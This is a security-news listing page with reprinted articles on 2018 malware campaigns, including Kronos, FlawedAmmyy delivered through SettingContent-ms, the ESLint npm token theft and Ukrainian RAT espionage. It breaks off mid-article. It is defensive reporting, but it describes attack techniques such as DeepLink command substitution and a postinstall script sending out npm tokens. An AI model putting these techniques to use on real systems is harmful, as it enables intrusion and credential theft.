- Virus -

Last update 09.10.2017 13:47:12

Home  Analysis  Android  Apple  APT  Attack  BigBrothers  BotNet  Congress  Crime  Crypto  Cryptocurrency  Cyber  CyberCrime  CyberSpy  CyberWar  Exploit  Forensics  Hacking  ICS  Incindent  iOS  IT  IoT  Mobil  OS  Phishing  Privacy  Ransomware  Safety  Security  Social  Spam  Vulnerebility  Virus

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6 


LoJax Command and Control Domains Still Active




Emotet Returns from the Holidays With New Tricks




Emotet infections and follow-up malware




Researchers Create PoC Malware for Hacking Smart Buildings




SmokeLoader malware downloader enters list of most wanted malware




Quick Maldoc Analysis




The ‘AVE_MARIA’ Malware




App Store Games Found Communicating with Golduck Malware C&C servers



Opera Blacklists Tampermonkey Extension Being Installed by MalwareVirusBleepingcomputer


Analyzing Encrypted Malicious Office Documents




Malicious .tar Attachments




A Malicious JPEG?




Malicious Script Leaking Data via FTP



2.1.19Experts analyzed the distribution technique used in a recent Emotet campaignVirusSecurityaffairs


Maldoc with Nonfunctional Shellcode




Maldoc with Nonfunctional Shellcode




2019 Malware Trends to Watch




Malware Attack Crippled Production of Major U.S. Newspapers




Malware-based attack hit delivery chain of the major US newspapers


New Shamoon Sample from France Signed with Baidu Certificate


A new Shamoon 3 sample uploaded to VirusTotal from France



Hackers target financial firms hosting malicious payloads on Google Cloud Storage



Fake Amazon Order Confirmations Push Banking Trojans on Holiday Shoppers



Shamoon 3 Wiper Code Includes Verse From QuranVirusSecurityweek


Popular Banking Trojans Share Loaders



Restricting PowerShell Capabilities with NetSh




Backdoor Targeting Malaysian Government a "Mash-up" of Malware




WordPress Targeted with Clever SEO Injection Malware




Shamoon 3 Attacks Targeted Several Sectors



A second sample of the Shamoon V3 wiper analyzed by the experts



Shamoon Disk Wiper Returns with Second Sample Uncovered this Month



Random Port Scan for Open RDP Backdoor




New Shamoon Malware Variant Targets Italian Oil and Gas Company




Shamoon Disk-Wiping Malware Re-emerges with Two New Variants



New Variant of Shamoon Malware Uploaded to VirusTotalVirusSecurityweek


A new variant of Shamoon was uploaded to Virus Total while Saipem was under attackVirus



November 18: Most wanted malware exposed




Cobalt Group Pushes Revamped ThreadKit Malware




Cobalt Bank Robbers Use New ThreadKit Malicious Doc Builder



Seedworm Spy Gang Stores Malware on GitHub, Keeps Up with Infosec Advances



Supply chain compromise: Adding undetectable hardware Trojans to integrated circuits



9.12.18Sextortion Emails now Leading to Ransomware and Info-Stealing TrojansVirusBleepingcomputer

Reader Malware Submission: MHT File Inside a ZIP File




A Dive into malicious Docker Containers




DeepPhish Project Shows Malicious AI is Not as Dangerous as FearedVirusSecurityweek


DanaBot Banking Trojan Gets into Spam BusinessVirusBleepingcomputer


Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection ChainVirusSecurityaffairs


Infected WordPress Sites Are Attacking Other WordPress Sites




SNDBOX - an AI Powered Malware Analysis Site is LaunchedVirusBleepingcomputer
5.12.18Is Malware Heading Towards a WarGames-style AI vs AI Scenario?VirusSecurityweek


Malware Dropper Supports a Dozen Decoy Document FormatsVirusSecurityweek


Campaign evolution: Hancitor changes its Word macros




Digital Oscilloscope Comes with Backdoor Accounts, Old Software ComponentsVirusBleepingcomputer
4.12.18Dissecting the latest Ursnif DHL-Themed CampaignVirusSecurityaffairs
4.12.18Malspam pushing Lokibot malwareSpam  VirusSANS

Lawsuit Claims Pegasus Spyware Helped Saudis Spy on Khashoggi



1.12.18New PowerShell-based Backdoor points to MuddyWater


30.11.18New PowerShell Backdoor Resembles "MuddyWater" Malware


30.11.18Brazilian Financial Malware Spreads Beyond National BoundariesVirusSecurityweek

Dissecting the Mindscrew-Powershell Obfuscation

29.11.18Indian Police Break Up International Computer Virus ScamVirusSecurityweek


AutoIt-Compiled Worm Spreads Backdoor via Removable DrivesVirusSecurityweek


Pegasus Spyware Targets Investigative Journalists in Mexico




Widespread Malvertising Campaign Hijacks 300 Million Sessions




The SLoad Powershell malspam is expanding to Italy

Spam   Virus

24.11.18New Emotet Thanksgiving campaign differs from previous onesVirusPBWCZ.CZ


New Emotet Thanksgiving campaign differs from previous ones



Emotet’s Thanksgiving Campaign Delivers New Recipes for Compromise




Emotet Banking Trojan Loves U.S.A Internet Providers




Olympic Destroyer Wiper Changes Up Infection Routine




TrickBot Banking Trojan Starts Stealing Windows Problem History

18.11.18Using Microsoft Powerpoint as Malware DropperVirusPBWCZ.CZ
17.11.18tRat is a new modular RAT used by the threat actor TA505VirusPBWCZ.CZ
16.11.18Dridex/Locky Operators Unleash New Malware in Recent AttackVirusPBWCZ.CZ
15.11.18The ‘MartyMcFly’ investigation: Italian naval industry under attackVirusPBWCZ.CZ

Ahead of Black Friday, Rash of Malware Families Takes Aim at Holiday Shoppers



8.11.18U.S. Cyber Command Shares Malware via VirusTotalVirusPBWCZ.CZ
5.11.18USB drives are primary vector for destructive threats to industrial facilitiesVirusPBWCZ.CZ
2.11.18USB Drives Deliver Dangerous Malware to Industrial Facilities: HoneywellVirusPBWCZ.CZ
29.10.18How to deliver malware using weaponized Microsoft Office docs embedding YouTube videoVirusPBWCZ.CZ
26.10.18Banking Trojans in Google Play Pose as Utility AppsVirusPBWCZ.CZ
24.10.18Russian Government-owned research institute linked to Triton attacksVirusPBWCZ.CZ
21.10.18Chinese Hackers Use 'Datper' Trojan in Recent CampaignVirusPBWCZ.CZ
20.10.18The author of the LuminosityLink RAT sentenced to 30 Months in PrisonVirusPBWCZ.CZ
20.10.18MartyMcFly Malware: new Cyber-Espionage Campaign targeting Italian Naval IndustryVirusPBWCZ.CZ
18.10.18Insurer Anthem Will Pay Record $16M for Massive Data BreachVirusPBWCZ.CZ
18.10.18Malicious RTF Documents Deliver Information StealersVirusPBWCZ.CZ
14.10.18Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate updateVirusPBWCZ.CZ
13.10.18Hackers targeting Drupal vulnerabilities to install the Shellbot BackdoorVirusPBWCZ.CZ
4.10.18Betabot - An Example of Cheap Modern Malware SophisticationVirusPBWCZ.CZ
4.10.18Researchers Link New NOKKI Malware to North Korean ActorVirusPBWCZ.CZ
3.10.18New Danabot Banking Malware campaign now targets banks in the U.S.VirusPBWCZ.CZ
2.10.18The ‘Gazorp’ Azorult Builder emerged from the Dark WebVirusPBWCZ.CZ
2.10.18GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routersVirusPBWCZ.CZ
2.10.18Fileless Malware Attacks on the Rise, Microsoft SaysVirusPBWCZ.CZ
28.9.18USB threats from malware to minersVirusPBWCZ.CZ
28.9.18Talos experts published technical details for other seven VPNFilter modulesVirusPBWCZ.CZ
28.9.18Notorious Hackers Serve SpicyOmelette to Unsuspecting VictimsVirusPBWCZ.CZ
27.9.18New VPNFilter Modules Reveal Extensive CapabilitiesVirusPBWCZ.CZ
26.9.18Crooks leverages Kodi Media Player add-ons for malware distributionVirusPBWCZ.CZ
25.9.18Threats posed by using RATs in ICSVirusPBWCZ.CZ
25.9.18New Adwind Campaign Targets Linux, Windows, and macOSVirusPBWCZ.CZ
23.9.18DanaBot banking Trojan evolves and now targets European countriesVirusPBWCZ.CZ
22.9.18Report Reveals Widespread Use of Pegasus SpywareVirusPBWCZ.CZ
22.9.18Legitimate RATs Pose Serious Risk to Industrial SystemsVirusPBWCZ.CZ
21.9.18Sustes Malware: CPU for MoneroVirusPBWCZ.CZ
20.9.18Destructive Xbash Linux Malware Targets Enterprise IntranetsVirusPBWCZ.CZ
20.9.18Fidelis Cybersecurity Raises $25 MillionVirusPBWCZ.CZ
18.9.18Cracked Windows installations are serially infected with EternalBlue exploit codeVirusPBWCZ.CZ
18.9.18EternalBlue-Vulnerable Systems Serially InfectedVirusPBWCZ.CZ
18.9.18New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and wormsVirusPBWCZ.CZ
16.9.18LuckyMouse signs malicious NDISProxy driver with certificate of Chinese IT companyVirusPBWCZ.CZ
14.9.18 Multi-Stage Malware Heavily Used in Recent Cobalt AttacksVirusPBWCZ.CZ
7.9.18USB Drives shipped with Schneider Solar Products were infected with malwareVirusPBWCZ.CZ
5.9.18GOBLIN PANDA Targets Vietnam AgainVirusPBWCZ.CZ
30.8.18CEIDPageLock Rootkit Hijacks Web BrowsersVirusPBWCZ.CZ
28.8.18"Evil Internet Minute" Report Shows Scale of Malicious Online ActivityVirusPBWCZ.CZ
24.8.18AdvisorsBot Malware Downloader DiscoveredVirusPBWCZ.CZ
22.8.18CrowdStrike Adds Malware Search Engine to 'Hybrid Analysis'VirusPBWCZ.CZ
21.8.18 New Spyware Framework for Android DiscoveredVirusPBWCZ.CZ
21.8.18Dark Tequila Banking malware targets Latin America since 2013VirusPBWCZ.CZ
21.8.18 Necurs Campaign Targets BanksVirusPBWCZ.CZ
20.8.18Unusual Malspam campaign targets banks with Microsoft Publisher filesVirusPBWCZ.CZ
20.8.18Malware researcher reverse engineered a threat that went undetected for at least 2 yearsVirusPBWCZ.CZ
13.8.18IBM Describes AI-powered Malware That Can Hide Inside Benign ApplicationsVirusPBWCZ.CZ
10.8.18The analysis of the code reuse revealed many links between North Korea malwareVirusPBWCZ.CZ
10.8.18Researchers Say Code Reuse Links North Korea's MalwareVirusPBWCZ.CZ
10.8.18DeepLocker – AI-powered malware are already among usVirusPBWCZ.CZ
6.8.18Malware Hits Plants of Chip Giant TSMCVirusPBWCZ.CZ
5.8.18A malware paralyzed TSMC plants where also Apple produces its devicesVirusPBWCZ.CZ
2.8.18FireEye MalwareGuard Uses Machine Learning to Detect MalwareVirusPBWCZ.CZ
2.8.18Human Rights Group: Employee Targeted With Israeli SpywareVirusPBWCZ.CZ
2.8.18Amnesty International employee targeted with NSO group surveillance malwareVirusPBWCZ.CZ
31.7.18 Advanced Malvertising Campaign Exploits Online Advertising Supply ChainVirusPBWCZ.CZ
31.7.18A new sophisticated version of the AZORult Spyware appeared in the wildVirusPBWCZ.CZ
30.7.18Office Vulnerabilities Chained to Deliver BackdoorVirusPBWCZ.CZ
30.7.18 FELIXROOT Backdoor is back in a new fresh spam campaignVirusPBWCZ.CZ
30.7.18Mysterious snail mail from China sent to US agencies includes Malware-Laden CDVirusPBWCZ.CZ
28.7.18Parasite HTTP RAT Packs Extensive Protection MechanismsVirusPBWCZ.CZ
28.7.18Kronos Banking Trojan resurrection, new campaigns spotted in the wildVirusPBWCZ.CZ
28.7.18Parasite HTTP RAT implements a broad range of protections and evasion mechanimsVirusPBWCZ.CZ

Kronos Banking Trojan Has Returned
26.7.18 securityweek

The Kronos banking Trojan is showing renewed strength and has been very active over the past several months, Proofpoint security researchers warn.

Kronos malware was first discovered in 2014 and maintained a steady presence on the threat landscape for a few years, before largely disappearing for a while. It uses man-in-the-browser (MiTB) attacks and webinjects to modify accessed web pages and steal user credentials, account information, and other data. It can also log keystrokes and has hidden VNC functionality.

Last year, the United States Federal Bureau of Investigation said that Kronos was built and distributed by British researcher Marcus Hutchins, who goes by the online handle of MalwareTech and who is known for stopping the WannaCry ransomware attack.

The new Kronos samples, which were observed in campaigns targeting users in Germany, Japan, and Poland, are connecting to a command and control (C&C) domain on the Tor network. There’s also speculation that the malware might have been rebranded to Osiris, but no hard evidence on this has emerged so far.

The first campaign carrying the new Kronos samples was observed on June 27, targeting German users with malicious documents attached to spam emails. The documents carried macros to download and execute the malware and the SmokeLoader Trojan downloader was used in some cases.

Targeting Japan, the second campaign was observed on July 13 and involved a malvertising chain. Malicious ads took users to a site where JavaScript injections redirected to the RIG exploit kit, which delivered SmokeLoader. The downloader would then drop Kronos onto the compromised machines.

The Poland campaign started on July 15 and involved fake invoice emails carrying malicious documents that attempted to exploit CVE-2017-11882 (the Equation Editor vulnerability) to download and execute Kronos.

The Kronos samples observed in all three campaigns were configured to use .onion domains for C&C purposes. The researchers also observed that webinjects were used in the German and Japanese campaigns, but none was seen in the attacks on Poland.

A fourth campaign observed on July 20 appeared to be work in progress. The Kronos samples were once again configured to use the Tor network and a test webinject was spotted.

The 18 Kronos samples feature extensive code and string overlap with the older versions, abuse the same Windows API hashing technique and hashes and the same string encryption technique, leverage the same webinject format, and feature the same C&C encryption mechanism and C&C protocol and encryption.

The C&C panel file layout is also similar to the older variants and a self-identifying string is also present in the malware. The major change, however, is the use of .onion C&C URLs and the Tor network to anonymize communications.

There is also some evidence to suggest that the malware might have been rebranded to Osiris (the Egyptian god of rebirth).

The new malware is being advertised on underground forums as packing capabilities that overlap with those observed in the new version of Kronos and as having about the same size (at 350 KB), and the researchers also observed a filenaming scheme in Kronos that appears to suggest a connection with Osiris.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape. […] While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,” Proofpoint concludes.

TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT
22.7.18 securityaffairs 

Proofpoint uncovered a massive malspam campaign leveraging emails delivering weaponized PDF documents containing malicious SettingContent-ms files.
Security experts from Proofpoint have uncovered a massive malspam campaign, crooks sent hundreds of thousands of emails delivering weaponized PDF documents containing malicious SettingContent-ms files.

Experts attributed the malspam campaign to the cybercriminal group tracked as TA505, the attackers are spreading the FlawedAmmyy RAT.

The SettingContent-ms file format was implemented in Windows 10 to allows a user to create “shortcuts” to various Windows 10 setting pages.

Thi file opens the Control Panel for the user [control.exe], experts noticed that it includes the <DeepLink> element in the schema.

SettingContent-ms files

This element takes any binary with parameters and executes it, this means that an attacker can substitute ‘control.exe’ with a malicious script that could execute any command, including cmd.exe and PowerShell, without user interaction.

“After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.” wrote experts from Specterops.

“The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?”

Experts noticed that maliciously SettingContent-ms file can bypass Windows 10 security mechanisms such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.

In June experts from SpecterOps monitored several campaigns abusing the SettingContent-ms file format within Microsoft Word documents, but only a few days ago Proofpoint experts noticed threat actors leveraging PDF documents.

“Colleagues at SpecterOps recently published research[1] on abuse of the SettingContent-ms file format. Crafted SettingContent-ms files can be used to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.” reads the analysis published by Proofpoint.

“We first observed an actor embedding SettingContent-ms inside a PDF on June 18. However, on July 16 we observed a particularly large campaign with hundreds of thousands of messages attempting to deliver PDF attachments with an embedded SettingContent-ms file.”

SettingContent-ms files campaign

Once the victim has opened the PDF file, Adobe Reader will display a warning message asking the user if they want to open the file, since it is attempting to run the embedded “downl.SettingContent-ms” via JavaScript. Experts noticed that the warning message is displayed for any file format embedded within a PDF, not only for SettingContent-ms files.

If the victim clicks the “OK” prompt, the PowerShell command included in the <DeepLink> element downloads and execute the FlawedAmmyy RAT.

The FlawedAmmyy RAT has been active since 2016, it borrows the code of the Ammyy Admin remote access Trojan.

FlawedAMMYY implements common backdoor features, it allows attackers to manage files, capture the screen, remote control the machine, establish RDP SessionsService, and much more.

Experts attributed the malspam campaign to the TA505 threat actor based on email messages, as well as the payload.

The TA505 operates on a large scale, it was behind other major campaigns leveraging the Necurs botnet to deliver other malware, including the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.

“Whether well established (like TA505) or newer to the space, attackers are quick to adopt new techniques and approaches when malware authors and researchers publish new proofs of concept. While not all new approaches gain traction, some may become regular elements through which threat actors rotate as they seek new means of distributing malware or stealing credentials for financial gain.” concludes Proofpoint researchers, “In this case, we see TA505 acting as an early adopter, adapting the abuse of SettingContent-ms files to a PDF-based attack delivered at significant scale.”

Mobile Malware Campaign targets users in India through rogue MDM service
19.7.18 securityaffairs

Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware distributed through a bogus MDM service
Security experts from Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware that has been active at least since August 2015. The researchers believe that cyberspies are operating from China and they found spying on 13 selected iPhones in the same country.

Attackers were abusing a mobile device management (MDM) service that normally allows large enterprises to control devices being used by the employees and enforce policies.

The access to the MDM service used by a company could allow an attacker to control employees’ devices and deploy malware and the targeted devices.

bogus MDM service

“Cisco Talos has identified a highly targeted campaign against 13 iPhones which appears to be focused on India. The attacker deployed an open-source mobile device management (MDM) system to control enrolled devices.” reads the analysis published by Cisco Talos.

“At this time, we don’t know how the attacker managed to enroll the targeted devices. Enrollment could be done through physical access to the devices, or most likely by using social engineering to entice a user to register”

To enroll an iOS device into the MDM service requires a user to manually install enterprise development certificate. Enterprises can obtain such kind of certificates through the Apple Developer Enterprise Program.

Enterprise can deliver MDM configuration file through email or a webpage for over-the-air enrollment service using the Apple Configurator.

“MDM uses the Apple Push Notification Service (APNS) to deliver a wake-up message to a managed device. The device then connects to a predetermined web service to retrieve commands and return results,” reads Apple about MDM.

Cisco’s Talos experts believe that attackers used either social engineering techniques, such as a fake tech support-style call or gaining in some way a physical access to the targeted devices.

The threat actors behind this campaign used the BOptions sideloading technique to inject malicious code to legitimate apps, including the messaging apps WhatsApp and Telegram that were then deployed through the MDM service onto the 13 targeted devices in India.

The BOptions sideloading technique allowed the attacker to inject a dynamic library in the application that implements spyware capabilities. The malicious code allows that attacker of collecting and exfiltrating information from the targeted device, including the phone number, serial number, location, contacts, user’s photos, SMS and Telegram and WhatsApp chat messages.

It is still a mystery how attackers tricked victims into installing a certificate authority on the iPhone and how they added the 13 targeted iPhones into their rogue MDM service.

Exfiltrated data and information about the compromised devices were sent to a remote server located at hxxp[:]//techwach[.]com

Among the tainted apps used by the attackers, there was also PrayTime, an application that notifies users when it is time to pray.

“Talos identified another legitimate app executing malicious code during this campaign in India. PrayTime is used to give the user a notification when it’s time to pray,” continues the analysis.

“The purpose is to download and display specific ads to the user. This app also leverages private frameworks to read the SMS messages on the device it is installed on and uploads these to the C2 server.”

Talos was not able to attribute the attack to a specific actor either which are its motivations, they were only able to find evidence suggesting the attackers were operating from India. Experts noticed that attackers planted a “false flag” by posing as a Russian threat actor.

“The certificate was issued in September 2017 and contains an email address located in Russia. Our investigation suggests that the attacker is not based out of Russia. We assume this is a false flag to point researchers toward the idea of a “classical Russian hacker.” False flags are becoming more common in malware, both sophisticated and simple. It’s an attempt to muddy the waters for the analysts/researchers to direct blame elsewhere.” continues the analysis.

Talos shared its findings with Apple that quickly revoked 3 certificates used in this campaign.

Further details, including IoCs are reported in the analysis shared by Talos.

Crooks deployed malicious ESLint packages that steal software registry login tokens
19.7.18 securityaffairs

Hackers compromised the npm account of an ESLint maintainer and published malicious versions of eslint packages to the npm registry.
Crooks compromised an ESLint maintainer’s account last week and uploaded malicious packages that attempted to steal login tokens from the npm software registry. npm is the package manager for JavaScript and the world’s largest software registry.

ESLint is open source “pluggable and configurable linter tool” for identifying and reporting on patterns in JavaScript, it was created by Nicholas Zakas.

The affected packages hosted on npm are:

eslint-scope version 3.7.2 o, a scope analysis library used by older versions of eslint, and the latest versions of babel-eslint and webpack.
eslint-config-eslint version 5.0.2 is a configuration used internally by the ESLint team.
Once the tainted packages are installed, they will download and execute code from pastebin.com that was designed to grab the content of the user’s .npmrc file and send the information to the attacker. This file usually contains access tokens for publishing to npm.

“The attacker modified package.json in both eslint-escope@3.7.2 and eslint-config-eslint@5.0.2, adding a postinstall script to run build.js. This script downloads another script from Pastebin and evals its contents.” wrote Henry Zhu about the eslint-scope attack.

“The script extracts the _authToken from a user’s .npmrc and sends it to histats and statcounter inside the Referer header,”

The packages were quickly removed once they were discovered by maintainers and the content on pastebin.com was taken down.

“On July 12th, 18, an attacker compromised the npm account of an ESLint maintainer and published malicious versions of the eslint-scope and eslint-config-eslint packages to the npm registry. On installation, the malicious packages downloaded and executed code from pastebin.com which sent the contents of the user’s .npmrc file to the attacker.” reads the security advisory published by ESLint.

“An .npmrc file typically contains access tokens for publishing to npm. The malicious package versions are eslint-scope@3.7.2 and eslint-config-eslint@5.0.2, both of which have been unpublished from npm. The pastebin.com paste linked in these packages has also been taken down.”

ESLint packages

The npm login tokens grabbed by malicious packages don’t include user’s npm password, but npm opted to revoke possibly impacted tokens. Users can revoke existing tokens as suggested by npm.

“We have now invalidated all npm tokens issued before 18-07-12 12:30 UTC, eliminating the possibility of stolen tokens being used maliciously. This is the final immediate operational action we expect to take today.” reads the npm’s incident report.

Further investigation allowed the maintainers to determine that the account was compromised because the ower had reused the same password on multiple accounts and also didn’t enabled two-factor authentication on their npm account.

ESLint released eslint-scope version 3.7.3 and eslint-config-eslint version 5.0.3.

Users who installed the malicious packages need to update npm.

QUASAR, SOBAKEN AND VERMIN RATs involved in espionage campaign on Ukraine
19.7.18 securityaffairs

Security experts from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions and involving three different RATs, including the custom-made VERMIN.
Security researchers from ESET uncovered an ongoing cyber espionage campaign aimed at Ukrainian government institutions, attackers used at least three different remote access Trojans (RATs).

The campaign was first spotted in January by experts from PaloAlto Networks when the researchers discovered a new piece of malware tracked VERMIN RAT targeting Ukraine organizations.

“Pivoting further on the initial samples we discovered, and their infrastructure, revealed a modestly sized campaign going back to late 2015 using both Quasar RAT and VERMIN.” reads the report from PaloAlto Networks.


Back to the present, the experts discovered that the attackers used several RATs to steal sensitive documents, the researchers collected evidence of the involvement of the Quasar RAT, Sobaken RAT, and Vermin.

The Quasar RAT is available for free on GitHub, many other attackers used it in their campaigns, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats. Sobaken is an improved version of Quasar RAT, that includes several anti-sandbox and other evasion mechanisms.

The RATs have been used against different targets at the same time, experts noticed they share some infrastructure and connect to the same C&C servers.


The threat actors don’t have advanced skills, their attack vector is spear phishing messages and they have been quite successful in using social engineering to lure victims into opening the email and downloading and executing the malicious codes.

“Even though these threat actors don’t seem to possess advanced skills or access to 0-day vulnerabilities, they have been quite successful in using social engineering to both distribute their malware and fly under the radar for extended periods of time.” Reads the analysis published by ESET.

“We were able to trace attacker activity back to October 2015; however, it is possible that the attackers
have been active even longer. These attackers use three different .NET malware strains in their attacks – Quasar RAT, Sobaken (a RAT derived from Quasar) and a custom-made RAT called Vermin. All three malware strains have been in active use against different targets at the same time, they share some infrastructure and connect to the same C&C servers.”

Some emails carried weaponized Word documents attempting to exploit CVE-2017-0199, attackers used a dropper masquerades as a legitimate software (i.e. Adobe, Intel or Microsoft) to deliver the final payload.

The threat actors used a scheduled task that executes the malware every 10 minutes to achieve persistence on the infected machine.

“The installation procedure is the same for all three malware strains used by these attackers. A dropper drops a malicious payload file (Vermin, Quasar or Sobaken malware) into the %APPDATA% folder, in a subfolder named after a legitimate company (usually Adobe, Intel or Microsoft).” continues the report.

“Then it creates a scheduled task that runs the payload every 10 minutes to ensure its persistence.”

Since mid-2017, the threat actors adopted steganography to bypass content filtering by hiding the payloads in images that were hosted on the free image hosting websites saveshot.net and ibb.co.

The malicious code executed only on hosts where the Russian or Ukrainian keyboard layouts are installed, it also checks the IP address and the username on the target machine.

To avoid automated analysis systems, that often use tools like Fakenet-NG where all DNS/HTTP communication succeeds and returns some result, the malware generates a random
website name/URL and attempt to connect it. If the connection fails in some cases the system could be considered real and not a virtualized environment used by researchers.

“Among the many different malware attacks targeted at high value assets in Ukraine, these attackers haven’t received much public attention – perhaps because of their initial use of open-source-based malware before developing their own strain (Vermin).” concludes the report.

“Employing multiple malware families, as well as various infection mechanisms – including common social engineering techniques but also not-so-common steganography – over the past three years, could be explained by the attackers simply experimenting with various techniques and malware, or it may suggest operations by multiple subgroups.”

Further details on the campaign, including the IoCs are included in the report.

Malware Creator Admits to Building and Selling LuminosityLink RAT
19.7.18 securityweek 

A Kentucky man admitted in a U.S. court to developing and distributing the remote access Trojan known as LuminosityLink.

21-year-old Colton Ray Grubbs of Stanford, Kentucky, pleaded guilty to developing the malware and selling it to thousands of people, knowing it would be used for computer intrusion, according to court documents.

Also known as Luminosity, the LuminosityLink RAT was first spotted in April 2015, providing its users with surveillance capabilities such as remote desktop and webcam and microphone access; a smart keylogger that could target specific programs; a crypto-currency miner; and distributed denial of service (DDoS) features.

In early February 18, Europol and the UK’s National Crime Agency (NCA) announced an operation specifically targeting the sellers and users of Luminosity, but security researchers revealed soon after that the malware itself had been retired for over half a year.

According to the plea agreement obtained by investigative journalist Brian Krebs (PDF), Grubbs, who used the online handle of KFC Watermelon, admitted to have designed and sold LuminosityLink at $39.99 to over 6,000 customers between April 2015 and July 2017.

The malware was being distributed via the luminosity.link website and through the HackForums.net forum. Although he claimed the tool had legitimate purposes, being designed for system administration, the developer was touting capabilities that would allow potential customers to access and control systems without the legitimate owners’ knowledge or permissions.

According to the document filed in court, the hacker emphasized that the malware could be installed remotely without notification, as well as its keylogging and surveillance capabilities, file exfiltration functionality, the ability to steal login credentials, crypto-mining and DDoS features, and the ability to prevent detection and removal attempts from anti-malware software.

The document also claims that Grubbs was offering free support to customers, sending private messages to respond to “questions about accessing and controlling victim computers without authorization or detection.” He also admitted to recruiting other people to sell the malware as affiliates.

In July 2017, after learning the Federal Bureau of Investigation would raid his apartment, Grubbs warned the PayPal user who was collecting LuminosityLink payments, asked his roommate to hide a laptop in his car, and also concealed a debit card associated with his Bitcoin account and a phone storing his Bitcoin information.

“Defendant removed the hard drives from his desktop computer and removed them from his apartment before the authorized search so that they would not be seized by the government. Three days later, Defendant transferred over 114 bitcoin from his LuminosityLink bitcoin address into six new bitcoin addresses,” the plea agreement reads.

Overall, the hacker pleaded guilty to three counts, two of which carry maximum sentences of 5 years in prison and a fine of up to $250,000 each, while the third carries a maximum sentence of 20 years in prison and a fine of no more than $500,000.

RATs Bite Ukraine in Ongoing Espionage Campaign
19.7.18 securityweek 

An ongoing espionage campaign aimed at Ukraine is leveraging three different remote access Trojans (RATs), ESET security researchers warn.

The attacks apparently started in late 2015, but the first report on them emerged in January 18. ESET says they have been tracking the campaign since mid-2017, and that the attacks have been mainly focused on Ukrainian government institutions, with a few hundred victims in different organizations.

The actors behind this cyber-espionage campaign have been using multiple stealthy RATs to exfiltrate sensitive documents, namely Quasar RAT, Sobaken RAT, and a custom-made RAT called Vermin.

The attackers, which appear to lack advanced skills and access to zero-day vulnerabilities, are using emails and social engineering to distribute the malware. Some emails carried Word documents attempting to exploit CVE-2017-0199, a vulnerability patched in April 2017.

A dropper is usually used to deliver the final payload (which masquerades as software form Adobe, Intel or Microsoft) to the %APPDATA% folder and to achieve persistence via a scheduled task that executes the malware every 10 minutes. Steganography was also employed to trick content filtering, accordnig to a whitepaper (PDF) published by ESET.

To avoid automated analysis systems and sandboxes, the malware checks if the Russian or Ukrainian keyboard layouts are installed and terminates itself if none is found. It also checks the system’s IP address and the username on the machine. Moreover, it checks if the connection to a randomly generated website name/URL fails, as would be expected on a real system.

An open-source backdoor, Quasar RAT can be freely downloaded from GitHub and has been employed by the actors behind this campaign since at least October 2015. Other groups have been using the malware in their attacks as well, including the Gaza Cybergang, which is also known as Gaza Hackers Team and Molerats.

Sobaken is a heavily modified version of Quasar RAT, with removed functionality to make the executable smaller, but also with several anti-sandbox and other evasion tricks added.

Vermin RAT, on the other hand, is a custom-made backdoor that first emerged in mid-2016 and which continues to be used. Written in .NET, it is protected using ConfuserEx and uses Vitevic Assembly Embedder, free software for embedding required DLLs into the main executable.

The malware includes support for screen capturing, reading directory contents, file upload/download/deletion/renaming, process monitoring and termination, shell execution, run keylogger, folder manipulation, audio capture, and bot update.

Most of the commands are implemented in the main payload, but the RAT also includes support for optional components, such as audio recorder, keylogger, password stealer, and USB file stealer.

“These attackers haven’t received much public attention compared to others who target high-profile organizations in Ukraine. However, they have proved that with clever social engineering tricks, cyber-espionage attacks can succeed even without using sophisticated malware. This underscores the need for training staff in cybersecurity awareness, on top of having a quality security solution in place,” ESET notes.

VPNFilter Malware Hits Critical Infrastructure in Ukraine
18.7.18 securityweek 

The Security Service of Ukraine (SBU) revealed this week that the VPNFilter malware, which it attributed to Russian intelligence agencies, had targeted a critical infrastructure organization.

According to the SBU, the malware was detected on the systems of the Aulska chlorine station in Auly, Dnipropetrovsk. The organization is part of the country’s critical infrastructure as it supplies chlorine to water treatment and sewage plants across Ukraine.

The malware reportedly targeted technological processes and safety systems, but the security agency said it quickly detected and blocked the attempt. The SBU said the attack could have resulted in technological process disruptions or a crash of the affected systems, which could have led to a “disaster.” The agency believes the attackers’ goal was to disrupt operations at the facility.

While the SBU’s statement suggests that this attack was specifically aimed at the chlorine station, it’s also possible that the organization was an opportunistic target. VPNFilter at one point had ensnared at least 500,000 routers and network-attached storage (NAS) devices and Ukraine appears to be its main target.

Even after U.S. authorities disrupted VPNFilter by seizing one of its command and control (C&C) domains, researchers reported that the threat had continued to target devices in Ukraine.

The fact that Ukraine has attributed the VPNFilter attack to Russia is not surprising. Even the United States government has linked the operation to some cyber-espionage groups believed to be sponsored by the Kremlin.

The VPNFilter botnet, whose existence was brought to light in May, targets more than 50 types of routers and NAS devices from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.

The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.

This is not the first time an attack that targets Ukraine has been blamed on Russia. Moscow has also been accused of launching the NotPetya attack and campaigns aimed at Ukraine’s power grid.

Hackers Using Stolen D-Link Certificates for Malware Signing
12.7.18 securityweek 

A cyber-espionage group is abusing code-signing certificates stolen from Taiwan-based companies for the distribution of their backdoor, ESET reports.

